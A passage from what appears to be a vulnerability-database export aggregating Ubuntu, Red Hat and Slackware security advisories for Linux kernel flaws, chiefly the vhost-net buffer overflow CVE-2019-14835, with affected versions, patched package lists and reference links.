        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2715"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2727"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-63.71~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1041.43"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5016-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1041.43~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-63.71"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1037.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1039.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1032.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1037.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1039.42~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1033.36"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2716"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:2726"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      }
    ],
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163578"
      },
      {
        "db": "PACKETSTORM",
        "id": "163579"
      },
      {
        "db": "PACKETSTORM",
        "id": "163583"
      },
      {
        "db": "PACKETSTORM",
        "id": "163594"
      },
      {
        "db": "PACKETSTORM",
        "id": "163597"
      },
      {
        "db": "PACKETSTORM",
        "id": "163602"
      },
      {
        "db": "PACKETSTORM",
        "id": "163603"
      },
      {
        "db": "PACKETSTORM",
        "id": "163607"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163578",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163579",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163583",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163594",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163597",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163602",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163603",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163607",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164155",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2021-07-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "ident": null
      },
      {
        "date": "2021-07-21T16:02:03",
        "db": "PACKETSTORM",
        "id": "163578",
        "ident": null
      },
      {
        "date": "2021-07-21T16:02:11",
        "db": "PACKETSTORM",
        "id": "163579",
        "ident": null
      },
      {
        "date": "2021-07-21T16:02:44",
        "db": "PACKETSTORM",
        "id": "163583",
        "ident": null
      },
      {
        "date": "2021-07-21T16:04:11",
        "db": "PACKETSTORM",
        "id": "163594",
        "ident": null
      },
      {
        "date": "2021-07-21T16:04:29",
        "db": "PACKETSTORM",
        "id": "163597",
        "ident": null
      },
      {
        "date": "2021-07-21T16:05:06",
        "db": "PACKETSTORM",
        "id": "163602",
        "ident": null
      },
      {
        "date": "2021-07-21T16:05:14",
        "db": "PACKETSTORM",
        "id": "163603",
        "ident": null
      },
      {
        "date": "2021-07-21T16:05:44",
        "db": "PACKETSTORM",
        "id": "163607",
        "ident": null
      },
      {
        "date": "2021-09-14T16:28:49",
        "db": "PACKETSTORM",
        "id": "164155",
        "ident": null
      },
      {
        "date": "2021-07-20T19:15:09.747000",
        "db": "NVD",
        "id": "CVE-2021-33909",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "ident": null
      },
      {
        "date": "2023-11-07T03:35:56.050000",
        "db": "NVD",
        "id": "CVE-2021-33909",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163597"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "_id": null,
    "data": "Red Hat Security Advisory 2021-2735-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163578"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "overflow",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163578"
      }
    ],
    "trust": 0.1
  }
}

VAR-201909-0695

Vulnerability from variot - Updated: 2026-03-09 20:38

A buffer overflow flaw was found, in versions from 2.6.34 to 5.2.x, in the way Linux kernel's vhost functionality that translates virtqueue buffers to IOVs, logged the buffer descriptors during migration. A privileged guest user able to pass descriptors with invalid length to the host when migration is underway, could use this flaw to increase their privileges on the host. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. 6.5) - x86_64

(CVE-2019-14835)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. ========================================================================== Kernel Live Patch Security Notice 0058-1 October 22, 2019

linux vulnerability

A security issue affects these releases of Ubuntu:

| Series | Base kernel | Arch | flavors | |------------------+--------------+----------+------------------| | Ubuntu 18.04 LTS | 4.15.0 | amd64 | aws | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | lowlatency | | Ubuntu 18.04 LTS | 4.15.0 | amd64 | oem | | Ubuntu 18.04 LTS | 5.0.0 | amd64 | azure | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 14.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | aws | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.4.0 | amd64 | lowlatency | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | azure | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | generic | | Ubuntu 16.04 LTS | 4.15.0 | amd64 | lowlatency |

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux: Linux kernel

Details:

It was discovered that a race condition existed in the GFS2 file system in the Linux kernel. A local attacker could possibly use this to cause a denial of service (system crash). (CVE-2016-10905)

It was discovered that the USB gadget Midi driver in the Linux kernel contained a double-free vulnerability when handling certain error conditions. A local attacker could use this to cause a denial of service (system crash). (CVE-2018-20961)

It was discovered that the XFS file system in the Linux kernel did not properly handle mount failures in some situations. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2018-20976)

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-21008)

It was discovered that the Intel Wi-Fi device driver in the Linux kernel did not properly validate certain Tunneled Direct Link Setup (TDLS). A physically proximate attacker could use this to cause a denial of service (Wi-Fi disconnect). (CVE-2019-0136)

It was discovered that the Linux kernel on ARM processors allowed a tracing process to modify a syscall after a seccomp decision had been made on that syscall. A local attacker could possibly use this to bypass seccomp restrictions. (CVE-2019-2054)

It was discovered that an integer overflow existed in the Binder implementation of the Linux kernel, leading to a buffer overflow. A local attacker could use this to escalate privileges. (CVE-2019-2181)

It was discovered that the Bluetooth UART implementation in the Linux kernel did not properly check for missing tty operations. A local attacker could use this to cause a denial of service. (CVE-2019-10207)

Jonathan Looney discovered that an integer overflow existed in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service (system crash). (CVE-2019-11477)

Jonathan Looney discovered that the TCP retransmission queue implementation in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. (CVE-2019-11478)

It was discovered that the ext4 file system implementation in the Linux kernel did not properly zero out memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2019-11833)

It was discovered that the floppy driver in the Linux kernel did not properly validate meta data, leading to a buffer overread. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14283)

It was discovered that the floppy driver in the Linux kernel did not properly validate ioctl() calls, leading to a division-by-zero. A local attacker could use this to cause a denial of service (system crash). (CVE-2019-14284)

Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2019-14814)

Peter Pi discovered a buffer overflow in the virtio network backend (vhost_net) implementation in the Linux kernel. (CVE-2019-14835)

Update instructions:

The problem can be corrected by updating your livepatches to the following versions:

| Kernel | Version | flavors | |--------------------------+----------+--------------------------| | 4.4.0-148.174 | 58.1 | lowlatency, generic | | 4.4.0-148.174~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-150.176 | 58.1 | generic, lowlatency | | 4.4.0-150.176~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-151.178 | 58.1 | lowlatency, generic | | 4.4.0-151.178~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-154.181 | 58.1 | lowlatency, generic | | 4.4.0-154.181~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-157.185 | 58.1 | lowlatency, generic | | 4.4.0-157.185~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-159.187 | 58.1 | lowlatency, generic | | 4.4.0-159.187~14.04.1 | 58.1 | generic, lowlatency | | 4.4.0-161.189 | 58.1 | lowlatency, generic | | 4.4.0-161.189~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-164.192 | 58.1 | lowlatency, generic | | 4.4.0-164.192~14.04.1 | 58.1 | lowlatency, generic | | 4.4.0-165.193 | 58.1 | generic, lowlatency | | 4.4.0-1083.93 | 58.1 | aws | | 4.4.0-1084.94 | 58.1 | aws | | 4.4.0-1085.96 | 58.1 | aws | | 4.4.0-1087.98 | 58.1 | aws | | 4.4.0-1088.99 | 58.1 | aws | | 4.4.0-1090.101 | 58.1 | aws | | 4.4.0-1092.103 | 58.1 | aws | | 4.4.0-1094.105 | 58.1 | aws | | 4.15.0-50.54 | 58.1 | generic, lowlatency | | 4.15.0-50.54~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-51.55 | 58.1 | generic, lowlatency | | 4.15.0-51.55~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-52.56 | 58.1 | lowlatency, generic | | 4.15.0-52.56~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-54.58 | 58.1 | generic, lowlatency | | 4.15.0-54.58~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-55.60 | 58.1 | generic, lowlatency | | 4.15.0-58.64 | 58.1 | generic, lowlatency | | 4.15.0-58.64~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-60.67 | 58.1 | lowlatency, generic | | 4.15.0-60.67~16.04.1 | 58.1 | generic, lowlatency | | 4.15.0-62.69 | 58.1 | generic, lowlatency | | 4.15.0-62.69~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-64.73 | 58.1 | generic, lowlatency | | 4.15.0-64.73~16.04.1 | 58.1 | lowlatency, generic | | 4.15.0-65.74 | 58.1 | lowlatency, generic | | 4.15.0-1038.43 | 58.1 | oem | | 4.15.0-1039.41 | 58.1 | aws | | 4.15.0-1039.44 | 58.1 | oem | | 4.15.0-1040.42 | 58.1 | aws | | 4.15.0-1041.43 | 58.1 | aws | | 4.15.0-1043.45 | 58.1 | aws | | 4.15.0-1043.48 | 58.1 | oem | | 4.15.0-1044.46 | 58.1 | aws | | 4.15.0-1045.47 | 58.1 | aws | | 4.15.0-1045.50 | 58.1 | oem | | 4.15.0-1047.49 | 58.1 | aws | | 4.15.0-1047.51 | 58.1 | azure | | 4.15.0-1048.50 | 58.1 | aws | | 4.15.0-1049.54 | 58.1 | azure | | 4.15.0-1050.52 | 58.1 | aws | | 4.15.0-1050.55 | 58.1 | azure | | 4.15.0-1050.57 | 58.1 | oem | | 4.15.0-1051.53 | 58.1 | aws | | 4.15.0-1051.56 | 58.1 | azure | | 4.15.0-1052.57 | 58.1 | azure | | 4.15.0-1055.60 | 58.1 | azure | | 4.15.0-1056.61 | 58.1 | azure | | 4.15.0-1056.65 | 58.1 | oem | | 4.15.0-1057.62 | 58.1 | azure | | 4.15.0-1057.66 | 58.1 | oem | | 4.15.0-1059.64 | 58.1 | azure | | 5.0.0-1014.14~18.04.1 | 58.1 | azure | | 5.0.0-1016.17~18.04.1 | 58.1 | azure | | 5.0.0-1018.19~18.04.1 | 58.1 | azure | | 5.0.0-1020.21~18.04.1 | 58.1 | azure |

Support Information:

Kernels older than the levels listed below do not receive livepatch updates. Please upgrade your kernel as soon as possible.

| Series | Version | Flavors | |------------------+------------------+--------------------------| | Ubuntu 18.04 LTS | 4.15.0-1039 | aws | | Ubuntu 16.04 LTS | 4.4.0-1083 | aws | | Ubuntu 18.04 LTS | 5.0.0-1000 | azure | | Ubuntu 16.04 LTS | 4.15.0-1047 | azure | | Ubuntu 18.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 16.04 LTS | 4.15.0-50 | generic lowlatency | | Ubuntu 14.04 LTS | 4.4.0-148 | generic lowlatency | | Ubuntu 18.04 LTS | 4.15.0-1038 | oem | | Ubuntu 16.04 LTS | 4.4.0-148 | generic lowlatency |

References: CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, CVE-2019-14821, CVE-2019-14835

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security update Advisory ID: RHSA-2019:2866-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2866 Issue date: 2019-09-23 CVE Names: CVE-2019-14835 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.5 Extended Update Support.

Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.5) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.5) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.5) - ppc64, ppc64le, x86_64

(CVE-2019-14835)
Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1750727 - CVE-2019-14835 kernel: vhost-net: guest to host kernel escape during migration

Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.5):

Source: kernel-3.10.0-862.41.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm

x86_64: kernel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-devel-3.10.0-862.41.2.el7.x86_64.rpm kernel-headers-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm perf-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.5):

x86_64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.5):

Source: kernel-3.10.0-862.41.2.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm kernel-doc-3.10.0-862.41.2.el7.noarch.rpm

ppc64: kernel-3.10.0-862.41.2.el7.ppc64.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm perf-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm

ppc64le: kernel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm perf-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm

s390x: kernel-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm kernel-devel-3.10.0-862.41.2.el7.s390x.rpm kernel-headers-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm kernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm perf-3.10.0-862.41.2.el7.s390x.rpm perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm python-perf-3.10.0-862.41.2.el7.s390x.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.5):

ppc64: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2019-14835 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/kernel-vhost

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535 /AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m M3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF bjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y WtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa 2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/ FUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg XHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE AUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl NSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP Lej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr jZmQ2x5ylP4=z5bF -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/linux-4.4.199/: Upgraded. These updates fix various bugs and security issues. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 4.4.191: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117 Fixed in 4.4.193: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835 Fixed in 4.4.194: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821 Fixed in 4.4.195: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054 Fixed in 4.4.196: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215 Fixed in 4.4.197: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976 Fixed in 4.4.198: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133 Fixed in 4.4.199: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098 ( Security fix *) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz

Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz

MD5 signatures: +-------------+

Slackware 14.2 packages:

